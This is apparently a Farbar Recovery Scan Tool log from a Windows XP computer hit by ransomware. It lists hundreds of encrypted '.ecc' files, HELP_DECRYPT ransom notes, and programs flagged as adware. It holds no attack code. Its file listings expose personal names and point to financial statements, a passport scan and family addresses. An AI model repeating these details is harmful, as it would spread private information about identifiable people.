2015-02-24 22:48 - 2014-07-31 09:32 - 00014740 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal Journal 7.docx.ecc
2015-02-24 22:48 - 2014-07-29 08:18 - 00015172 _____ () C:\Documents and Settings\michelle coe\My Documents\ANN ARBOR NEIGHBORHOOD.docx.ecc
2015-02-24 22:48 - 2014-07-27 21:24 - 00019140 _____ () C:\Documents and Settings\michelle coe\My Documents\Charmagne Westphal Reflection Paper.docx.ecc
2015-02-24 22:48 - 2014-07-27 12:58 - 00016900 _____ () C:\Documents and Settings\michelle coe\My Documents\interview in special education setting.docx.ecc
2015-02-24 22:48 - 2014-07-27 12:35 - 00015684 _____ () C:\Documents and Settings\michelle coe\My Documents\Friendship Circle.docx.ecc
2015-02-24 22:48 - 2014-07-24 11:53 - 00014644 _____ () C:\Documents and Settings\michelle coe\My Documents\Journal 6 Charmagne Westphal.docx.ecc
2015-02-24 22:48 - 2014-07-22 09:16 - 00015700 _____ () C:\Documents and Settings\michelle coe\My Documents\Choice Project #2l.docx.ecc
2015-02-24 22:48 - 2014-07-20 22:34 - 00010948 _____ () C:\Documents and Settings\michelle coe\My Documents\Doc1.docx.ecc
2015-02-24 22:48 - 2014-07-20 20:10 - 00014116 _____ () C:\Documents and Settings\michelle coe\My Documents\Journal 5.docx.ecc
2015-02-24 22:48 - 2014-07-13 21:10 - 00014308 _____ () C:\Documents and Settings\michelle coe\My Documents\Beckys life chapter 2.docx.ecc
2015-02-24 22:48 - 2014-07-13 17:36 - 00016948 _____ () C:\Documents and Settings\michelle coe\My Documents\Choice Project 1.docx.ecc
2015-02-24 22:48 - 2014-07-10 07:00 - 00015220 _____ () C:\Documents and Settings\michelle coe\My Documents\Journal 4.docx.ecc
2015-02-24 22:48 - 2014-07-09 08:41 - 00014260 _____ () C:\Documents and Settings\michelle coe\My Documents\Checklist for existing facilities.docx.ecc
2015-02-24 22:48 - 2014-07-06 17:46 - 00014228 _____ () C:\Documents and Settings\michelle coe\My Documents\Individual Class Plan.docx.ecc
2015-02-24 22:48 - 2014-07-06 16:31 - 00015140 _____ () C:\Documents and Settings\michelle coe\My Documents\Journal 2.docx.ecc
2015-02-24 22:48 - 2014-07-01 12:36 - 00021716 _____ () C:\Documents and Settings\michelle coe\My Documents\first journal.docx.ecc
2015-02-24 22:48 - 2014-06-30 09:21 - 00012052 _____ () C:\Documents and Settings\michelle coe\My Documents\ipad apps.docx.ecc
2015-02-24 22:48 - 2014-06-30 08:20 - 00012548 _____ () C:\Documents and Settings\michelle coe\My Documents\five special education websites.docx.ecc
2015-02-24 22:34 - 2015-01-28 22:45 - 00013380 _____ () C:\Documents and Settings\michelle coe\Desktop\Thinking about Inclusive Education 2015.docx.ecc
2015-02-24 22:34 - 2015-01-21 11:52 - 00013492 _____ () C:\Documents and Settings\michelle coe\Desktop\Thinking about Inclusive education.docx.ecc
2015-02-24 22:34 - 2014-12-08 12:35 - 00015492 _____ () C:\Documents and Settings\michelle coe\Desktop\Charmagne Westphal Writing Analysis Perceptual.docx.ecc
2015-02-24 22:34 - 2014-12-08 12:15 - 00020548 _____ () C:\Documents and Settings\michelle coe\Desktop\Charmagne Westphal Final Reflections Summary.docx.ecc
2015-02-24 22:34 - 2014-12-05 14:15 - 00020548 _____ () C:\Documents and Settings\michelle coe\Desktop\Charmagne Westphal Reflections Summary.docx.ecc
2015-02-24 22:34 - 2014-12-04 12:37 - 00012740 _____ () C:\Documents and Settings\michelle coe\Desktop\Charmagne Westphal Article #3.docx.ecc
2015-02-24 22:34 - 2014-12-03 19:23 - 00014836 _____ () C:\Documents and Settings\michelle coe\Desktop\MARS PROJECT OVERVIEW REVISED.docx.ecc
2015-02-24 22:34 - 2014-12-03 18:35 - 00012484 _____ () C:\Documents and Settings\michelle coe\Desktop\Websites for Webquest.docx.ecc
2015-02-24 22:34 - 2014-12-03 18:14 - 00014836 _____ () C:\Documents and Settings\michelle coe\Desktop\MARS PROJECT OVERVIEW.docx.ecc
2015-02-24 22:34 - 2014-12-02 17:56 - 00028292 _____ () C:\Documents and Settings\michelle coe\Desktop\Charmagne Westphal CASE STUDY QUESTION 2014.docx.ecc
2015-02-24 22:34 - 2014-11-20 10:43 - 00016276 _____ () C:\Documents and Settings\michelle coe\Desktop\Charmagne Westphal DIGITAL STORYTELLING.docx.ecc
2015-02-24 22:34 - 2014-11-18 12:55 - 00014468 _____ () C:\Documents and Settings\michelle coe\Desktop\reflection on Unicorns are real.docx.ecc
2015-02-24 22:34 - 2014-11-17 11:55 - 00027908 _____ () C:\Documents and Settings\michelle coe\Desktop\Charmagne Westphal CASE STUDY 2014.docx.ecc
2015-02-24 22:34 - 2014-10-28 10:15 - 00018340 _____ () C:\Documents and Settings\michelle coe\Desktop\Charmagne Westphal Book reflection Brilliant Idiot.docx.ecc
2015-02-24 22:31 - 2015-01-10 13:01 - 00092436 _____ () C:\Documents and Settings\Administrator\My Documents\US1412B6S008020.Eticket.pdf.ecc
2015-02-24 22:31 - 2014-10-14 00:06 - 00014948 _____ () C:\Documents and Settings\Administrator\My Documents\There have been many incidences of animals being cloned in the laboratory.docx.ecc
2015-02-24 22:31 - 2014-09-02 18:00 - 00015892 _____ () C:\Documents and Settings\Administrator\My Documents\Letter that changed my life.docx.ecc
2015-02-24 22:31 - 2014-05-20 17:10 - 00040084 _____ () C:\Documents and Settings\Administrator\My Documents\Geneva.docx.ecc
2015-02-24 22:31 - 2014-05-11 15:04 - 00013828 _____ () C:\Documents and Settings\Administrator\My Documents\Fruitvale Station.docx.ecc
2015-02-24 22:31 - 2014-03-25 20:20 - 00013588 _____ () C:\Documents and Settings\Administrator\My Documents\lord of the flies discussion paper.docx.ecc
2015-02-24 22:31 - 2013-10-07 23:35 - 00012788 _____ () C:\Documents and Settings\Administrator\My Documents\food industry madison.docx.ecc
2015-02-24 22:31 - 2013-07-01 13:28 - 00016036 _____ () C:\Documents and Settings\Administrator\My Documents\Sched J 06.25.13.pdf.ecc
2015-02-24 22:31 - 2013-06-04 21:11 - 00093956 _____ () C:\Documents and Settings\Administrator\My Documents\Drawing2.2.dwg.ecc
2015-02-24 22:31 - 2013-01-12 13:28 - 01812644 _____ () C:\Documents and Settings\Administrator\My Documents\guide.pdf.ecc
2015-02-24 22:31 - 2013-01-12 13:25 - 00510116 _____ () C:\Documents and Settings\Administrator\My Documents\No Load Fund X dec152012.pdf.ecc
2015-02-24 22:31 - 2012-10-14 20:08 - 00059044 _____ () C:\Documents and Settings\Administrator\My Documents\Statement12302011 indiv.pdf.ecc
2015-02-24 22:31 - 2012-10-14 20:07 - 00070788 _____ () C:\Documents and Settings\Administrator\My Documents\Statement12302011.pdf.ecc
2015-02-24 22:31 - 2012-10-14 20:07 - 00069812 _____ () C:\Documents and Settings\Administrator\My Documents\Statement09282012.pdf.ecc
2015-02-24 22:31 - 2012-10-14 19:57 - 00209828 _____ () C:\Documents and Settings\Administrator\My Documents\STMT_12302011_XXXXX955_PriorityClientStmt.pdf.ecc
2015-02-24 22:31 - 2012-08-28 17:28 - 00604084 _____ () C:\Documents and Settings\Administrator\My Documents\Sub Zero 600ucguide.pdf.ecc
2015-02-24 22:31 - 2012-06-30 09:32 - 00013588 _____ () C:\Documents and Settings\Administrator\My Documents\Thank you all for coming to celebrate the life of our sister Julie.docx.ecc
2015-02-24 22:31 - 2012-06-26 21:48 - 00011892 _____ () C:\Documents and Settings\Administrator\My Documents\Julie Ann Shoner.docx.ecc
2015-02-24 22:31 - 2012-06-21 18:04 - 00012900 _____ () C:\Documents and Settings\Administrator\My Documents\Fax.docx.ecc
2015-02-24 22:31 - 2012-06-21 17:39 - 00011348 _____ () C:\Documents and Settings\Administrator\My Documents\June 21st.docx.ecc
2015-02-24 22:31 - 2012-03-14 16:42 - 00011540 _____ () C:\Documents and Settings\Administrator\My Documents\I.docx.ecc
2015-02-24 22:31 - 2012-01-28 16:55 - 06850324 _____ () C:\Documents and Settings\Administrator\My Documents\VZW_SCH-I510_DROID_CHARGE_English_User_Manual.pdf.ecc
2015-02-24 22:31 - 2012-01-08 21:58 - 00134004 _____ () C:\Documents and Settings\Administrator\My Documents\Passport.jpg.ecc
2015-02-24 22:31 - 2011-12-09 20:07 - 00014356 _____ () C:\Documents and Settings\Administrator\My Documents\rogue killer.docx.ecc
2015-02-24 22:31 - 2011-10-18 17:22 - 00015684 _____ () C:\Documents and Settings\Administrator\My Documents\Underwriters Laboratories.docx.ecc
2015-02-24 22:31 - 2011-05-30 13:23 - 00012468 _____ () C:\Documents and Settings\Administrator\My Documents\Nicholas A.docx.ecc
2015-02-24 22:31 - 2010-10-12 19:16 - 00079732 _____ () C:\Documents and Settings\Administrator\My Documents\Michelle and Nick at Kruse and Muer.jpg.ecc
2015-02-24 22:31 - 2010-08-18 17:51 - 00061812 _____ () C:\Documents and Settings\Administrator\My Documents\Grasshopper 6052 mower deck drawing.jpg.ecc
2015-02-24 22:31 - 2010-07-06 19:14 - 02243412 _____ () C:\Documents and Settings\Administrator\My Documents\Jenn Air 730-0336 manual.pdf.ecc
2015-02-24 22:31 - 2010-06-18 19:01 - 00333924 _____ () C:\Documents and Settings\Administrator\My Documents\Gosling Triathlon Road Course.jpg.ecc
2015-02-24 22:31 - 2010-05-29 14:38 - 00000196 ____H () C:\Documents and Settings\Administrator\My Documents\~$uipment Model Numbers and Specifications.docx.ecc
2015-02-24 22:31 - 2010-01-24 19:00 - 01219748 _____ () C:\Documents and Settings\Administrator\My Documents\FORM LETTER #28 10 - 01 13.pdf.ecc
2015-02-24 22:31 - 2010-01-24 18:48 - 00195908 _____ () C:\Documents and Settings\Administrator\My Documents\FIRST REMEDIAL ORDER 08 - 02.07.pdf.ecc
2015-02-24 22:31 - 2010-01-24 18:48 - 00055924 _____ () C:\Documents and Settings\Administrator\My Documents\FORM LETTER #28 10 - 01.13.pdf.ecc
2015-02-24 22:31 - 2009-12-12 17:21 - 00174292 _____ () C:\Documents and Settings\Administrator\My Documents\Martz Barn.jpg.ecc
2015-02-24 22:31 - 2009-10-24 20:40 - 00010692 _____ () C:\Documents and Settings\Administrator\My Documents\Equipment Model Numbers and Specifications.docx.ecc
2015-02-24 22:31 - 2009-09-19 22:09 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Active Home Professional
2015-02-24 22:31 - 2009-09-10 19:00 - 00022660 _____ () C:\Documents and Settings\Administrator\My Documents\Honda Letter.docx.ecc
2015-02-24 22:31 - 2009-08-23 12:10 - 00015492 _____ () C:\Documents and Settings\Administrator\My Documents\Family Addresses.docx.ecc
2015-02-24 22:30 - 2015-01-22 17:08 - 00016756 _____ () C:\Documents and Settings\Administrator\My Documents\C8.1 Worksheet.docx.ecc
2015-02-24 22:30 - 2014-09-17 22:42 - 00012900 _____ () C:\Documents and Settings\Administrator\My Documents\Descriptive essay ms. clark.docx.ecc
2015-02-24 22:30 - 2014-09-16 22:39 - 00013060 _____ () C:\Documents and Settings\Administrator\My Documents\College Essay 2.docx.ecc
2015-02-24 22:30 - 2014-09-09 22:17 - 00010820 _____ () C:\Documents and Settings\Administrator\My Documents\Debate athletic.docx.ecc
2015-02-24 22:30 - 2014-06-21 11:57 - 00120452 _____ () C:\Documents and Settings\Administrator\My Documents\9584  Cambridge.jpg.ecc
2015-02-24 22:30 - 2014-06-08 21:40 - 00016788 _____ () C:\Documents and Settings\Administrator\My Documents\Argo.docx.ecc
2015-02-24 22:30 - 2013-10-28 14:47 - 01043508 _____ () C:\Documents and Settings\Administrator\My Documents\CCF00192013_00000.jpg.ecc
2015-02-24 22:30 - 2013-07-01 13:29 - 00069668 _____ () C:\Documents and Settings\Administrator\My Documents\2013-06-14 Fee Agreement - Westphal CAW.doc.ecc
2015-02-24 22:30 - 2013-07-01 13:19 - 00075300 _____ () C:\Documents and Settings\Administrator\My Documents\2013 Resume.doc.ecc
2015-02-24 22:30 - 2013-07-01 13:17 - 00075300 _____ () C:\Documents and Settings\Administrator\My Documents\Current Resume 2013.doc.ecc
2015-02-24 22:30 - 2013-05-23 14:55 - 00024564 _____ () C:\Documents and Settings\Administrator\My Documents\Citizen's loss statement..xlsx1.htm.ecc
2015-02-24 22:30 - 2013-05-23 14:49 - 00126772 _____ () C:\Documents and Settings\Administrator\My Documents\Citizen's loss statement..xlsx.ecc
2015-02-24 22:30 - 2013-01-17 19:05 - 00431908 _____ () C:\Documents and Settings\Administrator\My Documents\600installguide.pdf.ecc
2015-02-24 22:30 - 2012-10-14 19:34 - 00306100 _____ () C:\Documents and Settings\Administrator\My Documents\ATT tax statement 2011.pdf.ecc
2015-02-24 22:30 - 2012-02-25 18:18 - 00081700 _____ () C:\Documents and Settings\Administrator\My Documents\dana.jpg.ecc
2015-02-24 22:30 - 2011-02-13 17:44 - 03292836 _____ () C:\Documents and Settings\Administrator\My Documents\Desa HDB20NT manual.pdf.ecc
2015-02-24 22:30 - 2011-01-01 00:17 - 00013060 _____ () C:\Documents and Settings\Administrator\My Documents\black ops zombies cheat codes.docx.ecc
2015-02-24 22:30 - 2010-02-27 18:28 - 00292468 _____ () C:\Documents and Settings\Administrator\My Documents\Billy Cole Letters.jpg.ecc
2015-02-24 22:20 - 2014-03-07 00:19 - 00013860 _____ () C:\ComboFix.txt.ecc
2015-02-24 22:20 - 2010-07-22 21:58 - 00000000 ____D () C:\730a5b28e0537a10fd4bec56
2015-02-24 22:20 - 2010-07-22 21:57 - 00000000 ____D () C:\93a343f86e24ae072814e075
2015-02-24 22:20 - 2009-08-09 21:42 - 00000000 ____D () C:\75c5ef836965d6281c4e31c06682
2015-02-22 12:19 - 2012-12-10 18:43 - 00701616 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerApp.exe
2015-02-22 12:19 - 2012-12-10 18:43 - 00071344 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerCPLApp.cpl
2015-02-22 04:35 - 2009-08-09 19:39 - 00000000 ____D () C:\Documents and Settings\Administrator
2015-02-20 17:14 - 2014-09-11 10:07 - 00000000 ____D () C:\SmartDraw CI
2015-02-20 17:02 - 2010-12-29 15:15 - 00000000 ____D () C:\Documents and Settings\NetworkService\Local Settings\Application Data\PCHealth
2015-02-20 17:02 - 2010-12-12 12:19 - 00000000 ____D () C:\Documents and Settings\michelle coe
2015-02-20 17:02 - 2010-07-22 00:09 - 00000000 ____D () C:\Documents and Settings\NetworkService\Application Data\Adobe
2015-02-20 17:02 - 2009-08-09 19:27 - 00000000 __SHD () C:\Documents and Settings\NetworkService
2015-02-20 16:59 - 2015-02-04 14:58 - 00000000 ____D () C:\Documents and Settings\michelle coe\Local Settings\Application Data\Skype
2015-02-20 16:59 - 2010-12-12 12:20 - 00000000 ____D () C:\Documents and Settings\michelle coe\Local Settings\Application Data\Mozilla
2015-02-20 16:57 - 2013-10-14 10:06 - 00000000 ____D () C:\Documents and Settings\michelle coe\Local Settings\Application Data\Google
2015-02-20 15:46 - 2010-12-12 12:26 - 00000000 ____D () C:\Documents and Settings\michelle coe\Application Data\Sun
2015-02-20 15:45 - 2010-12-12 12:22 - 00000000 ____D () C:\Documents and Settings\michelle coe\Application Data\Adobe
2015-02-20 15:45 - 2010-12-12 12:20 - 00000000 ____D () C:\Documents and Settings\michelle coe\Application Data\Mozilla
2015-02-20 15:45 - 2009-08-09 19:38 - 00000000 __SHD () C:\Documents and Settings\LocalService
2015-02-20 15:42 - 2013-06-04 17:19 - 00000000 ____D () C:\Autodesk
2015-02-20 15:42 - 2010-12-13 16:49 - 00000000 ____D () C:\ActiveHome Pro
2015-02-20 15:42 - 2009-10-09 15:01 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Logitech
2015-02-20 15:42 - 2009-08-10 01:13 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Malwarebytes
2015-02-20 15:42 - 2009-08-10 01:02 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\NOS
2015-02-15 01:07 - 2014-03-31 13:15 - 00000230 _____ () C:\WINDOWS\Tasks\Microsoft Windows XP End of Service Notification Monthly.job

==================== Files in the root of some directories =======

2009-08-16 22:54 - 2009-08-16 22:54 - 0036623 _____ () C:\Documents and Settings\Administrator\Application Data\Comma Separated Values (Windows).ADR
2015-02-24 22:20 - 2015-02-25 03:34 - 0000636 _____ () C:\Documents and Settings\Administrator\Application Data\key.dat
2015-02-24 22:20 - 2015-02-25 03:34 - 87668868 _____ () C:\Documents and Settings\Administrator\Application Data\log.html
2015-03-01 12:59 - 2015-03-01 12:59 - 0000105 _____ () C:\Documents and Settings\Administrator\Application Data\mbam.context.scan
2009-09-06 12:10 - 2009-12-26 08:12 - 0022328 _____ () C:\Documents and Settings\Administrator\Application Data\PnkBstrK.sys
2009-08-10 15:44 - 2014-01-19 10:28 - 0009216 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2011-12-05 18:08 - 2011-12-09 19:43 - 0015066 ___SH () C:\Documents and Settings\Administrator\Local Settings\Application Data\v6ty32s6fy3mfn
2015-02-20 15:44 - 2015-02-20 15:44 - 0008630 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.HTML
2015-02-20 15:44 - 2015-02-20 15:44 - 0045665 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.PNG
2015-02-20 15:44 - 2015-02-20 15:44 - 0004258 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.TXT
2015-02-20 15:44 - 2015-02-20 15:44 - 0000292 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.URL

Some content of TEMP:
====================
C:\Documents and Settings\michelle coe\Local Settings\temp\sysrestore.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

==================== End Of Log ============================
Additional scan result of Farbar Recovery Scan Tool (x86) Version: 11-03-2015
Ran by Administrator at 2015-03-14 13:07:55
Running from F:\
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Disabled - Out of date) {EDB4FA23-53B8-4AFA-8C5D-99752CCA7095}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe AIR (HKLM\...\Adobe AIR) (Version: 2.0.2.12610 - Adobe Systems Inc.)
Adobe Download Manager (HKLM\...\{E2883E8F-472F-4fb0-9522-AC9BF37916A7}) (Version: 1.6.2.63 - NOS Microsystems Ltd.)
Adobe Flash Player 16 NPAPI (HKLM\...\Adobe Flash Player NPAPI) (Version: 16.0.0.305 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.08) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.08 - Adobe Systems Incorporated)
Adobe Shockwave Player 11.5 (HKLM\...\Adobe Shockwave Player) (Version: 11.5.1.601 - Adobe Systems, Inc.)
Amazing Adventures: The Lost Tomb (HKLM\...\Steam App 3510) (Version: - PopCap)
AVG 2015 (HKLM\...\AVG) (Version: 2015.0.5751 - AVG Technologies)
AVG 2015 (Version: 15.0.4306 - AVG Technologies) Hidden
AVG 2015 (Version: 15.0.5751 - AVG Technologies) Hidden
Brother MFL-Pro Suite (HKLM\...\{D83BD5E2-5AF4-49F6-B5C1-484A9760E73D}) (Version: 1.00.000 - )
Call of Duty® - World at War™ (HKLM\...\InstallShield_{D80A6A73-E58A-4673-AFF5-F12D7110661F}) (Version: 1.0 - Activision)
Call of Duty® - World at War™ (Version: 1.0 - Activision) Hidden
Call of Duty: Black Ops - Multiplayer (HKLM\...\Steam App 42710) (Version: - Treyarch)
Call of Duty: Black Ops (HKLM\...\Steam App 42700) (Version: - Treyarch)
Call of Duty: Modern Warfare 2 - Multiplayer (HKLM\...\Steam App 10190) (Version: - Infinity Ward)
Call of Duty: Modern Warfare 2 (HKLM\...\Steam App 10180) (Version: - Infinity Ward)
CCleaner (HKLM\...\CCleaner) (Version: 4.10 - Piriform)
Critical Update for Windows Media Player 11 (KB959772) (HKLM\...\KB959772_WM11) (Version: - Microsoft Corporation)
DWG TrueView 2013 (HKLM\...\DWG TrueView 2013) (Version: 19.0.55.0 - Autodesk)
DWG TrueView 2013 (Version: 19.0.55.0 - Autodesk) Hidden
Elite Unzip (HKLM\...\Elite Unzip) (Version: 1.1.7640.260 - Mindspark Interactive Network) <==== ATTENTION
ffdshow v1.2.4422 [2012-04-09] (HKLM\...\ffdshow_is1) (Version: 1.2.4422.0 - )
Foxit PDF Creator Toolbar Updater (HKU\S-1-5-21-484763869-1604221776-1801674531-1004\...\{79A765E1-C399-405B-85AF-466F52E918B0}) (Version: 1.2.1.23037 - Ask.com) <==== ATTENTION
Foxit PDF Editor (HKLM\...\Foxit PDF Editor) (Version: 2.2.0.0205 - Foxit Software)
Foxit Reader (HKLM\...\Foxit Reader) (Version: - )
Google Chrome (HKLM\...\Google Chrome) (Version: 40.0.2214.115 - Google Inc.)
Google Earth (HKLM\...\{4D2A6330-2F8B-11E3-9C40-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Earth (HKLM\...\{96AD3B61-EAE2-11E2-9E72-B8AC6F98CCE3}) (Version: 7.1.1.1888 - Google)
Google Update Helper (Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (Version: 1.3.26.9 - Google Inc.) Hidden
Haali Media Splitter (HKLM\...\HaaliMkx) (Version: - FreeCodecPack)
LG USB Modem Drivers (HKLM\...\{FA02ACAC-9E14-4878-A257-92A22A647C2C}) (Version: 4.8.1 - LG Electronics)
Logitech QuickCam for Enterprise (HKLM\...\{70BA588C-DA92-4DA9-8F8F-E7124B26F8F5}) (Version: 11.72.1072 - Logitech Inc.)
Logitech QuickCam for Enterprise Driver Package (HKLM\...\lvdrivers_11.72) (Version: - )
Malwarebytes' Anti-Malware version 1.51.2.1300 (HKLM\...\Malwarebytes' Anti-Malware_is1) (Version: 1.51.2.1300 - Malwarebytes Corporation)
Microsoft .NET Framework 1.1 (HKLM\...\Microsoft .NET Framework 1.1 (1033)) (Version: - )
Microsoft .NET Framework 1.1 Security Update (KB2698023) (HKLM\...\M2698023) (Version: - )
Microsoft .NET Framework 1.1 Security Update (KB2833941) (HKLM\...\M2833941) (Version: - )
Microsoft .NET Framework 1.1 Security Update (KB979906) (HKLM\...\M979906) (Version: - )
Microsoft .NET Framework 2.0 Service Pack 2 (HKLM\...\{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}) (Version: 2.2.30729 - Microsoft Corporation)
Microsoft .NET Framework 3.0 Service Pack 2 (HKLM\...\{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}) (Version: 3.2.30729 - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version: - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft Base Smart Card Cryptographic Service Provider Package (HKLM\...\KB909520) (Version: - Microsoft Corporation)
Microsoft Compression Client Pack 1.0 for Windows XP (HKLM\...\MSCompPackV1) (Version: 1 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{91120000-002E-0000-0000-0000000FF1CE}_ULTIMATER_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Ultimate 2007 (HKLM\...\ULTIMATER) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.3.215.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft User-Mode Driver Framework Feature Pack 1.0 (HKLM\...\Wudf01000) (Version: - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Mozilla Firefox 18.0 (x86 en-US) (HKLM\...\Mozilla Firefox 18.0 (x86 en-US)) (Version: 18.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla)
MyPC Backup (HKLM\...\MyPC Backup) (Version: - JDi Backup Ltd) <==== ATTENTION
NVIDIA Drivers (HKLM\...\NVIDIA Drivers) (Version: 1.3 - NVIDIA Corporation)
OGA Notifier 2.0.0048.0 (Version: 2.0.0048.0 - Microsoft Corporation) Hidden
PaperPort (HKLM\...\{A17EABB6-D0C6-44E5-820C-72DC7F495064}) (Version: 9.02.0814 - ScanSoft, Inc.)
PunkBuster Services (HKLM\...\PunkBusterSvc) (Version: 0.986 - Even Balance, Inc.)
RCA Detective™ 2.0.0.98 (HKLM\...\RCA Detective™_is1) (Version: - RCA)
RCA Digital Voice Manager 5.0.3.1 (HKLM\...\RCA Digital Voice Manager_is1) (Version: - RCA)
RealFlight G2 Simulator (HKLM\...\RealFlight2) (Version: - )
RealFlight G3 R/C Simulator (HKLM\...\RealFlightG3Pro) (Version: - )
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: - Realtek Semiconductor Corp.)
Search Protect (HKLM\...\SearchProtect) (Version: 2.18.20.209 - Search Protect) <==== ATTENTION
Skype™ 7.1 (HKLM\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.1.105 - Skype Technologies S.A.)
Speed Test (HKLM\...\Speed Test) (Version: 4.1.0.0 - BestOffers) <==== ATTENTION
Steam (HKLM\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 7.12.4.0 - )
UnknownFile (HKU\S-1-5-21-484763869-1604221776-1801674531-500\...\UnknownFile) (Version: 1.0.0.0 - UnknownFile) <==== ATTENTION!
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002E-0000-0000-0000000FF1CE}_ULTIMATER_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)
Viber (HKU\S-1-5-21-484763869-1604221776-1801674531-500\...\Viber) (Version: 4.4.0.134678 - Viber Media Inc)
Visual Studio 2012 x86 Redistributables (HKLM\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
VLC media player 1.0.1 (HKLM\...\VLC media player) (Version: 1.0.1 - VideoLAN Team)
WebFldrs XP (Version: 9.50.7523 - Microsoft Corporation) Hidden
Windows Genuine Advantage Notifications (KB905474) (HKLM\...\WgaNotify) (Version: 1.9.0040.0 - Microsoft Corporation)
Windows Genuine Advantage Validation Tool (KB892130) (HKLM\...\KB892130) (Version: - Microsoft Corporation)
Windows Genuine Advantage Validation Tool (KB892130) (HKLM\...\WGA) (Version: 1.7.0069.2 - Microsoft Corporation)
Windows Internet Explorer 8 (HKLM\...\ie8) (Version: 20090308.140743 - Microsoft Corporation)
Windows Management Framework Core (HKLM\...\KB968930) (Version: - Microsoft Corporation)
Windows Media Format 11 runtime (HKLM\...\Windows Media Format Runtime) (Version: - )
Windows Media Player 11 (HKLM\...\Windows Media Player) (Version: - )
Yahoo! Toolbar (HKLM\...\Yahoo! Companion) (Version: - Yahoo! Inc.)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

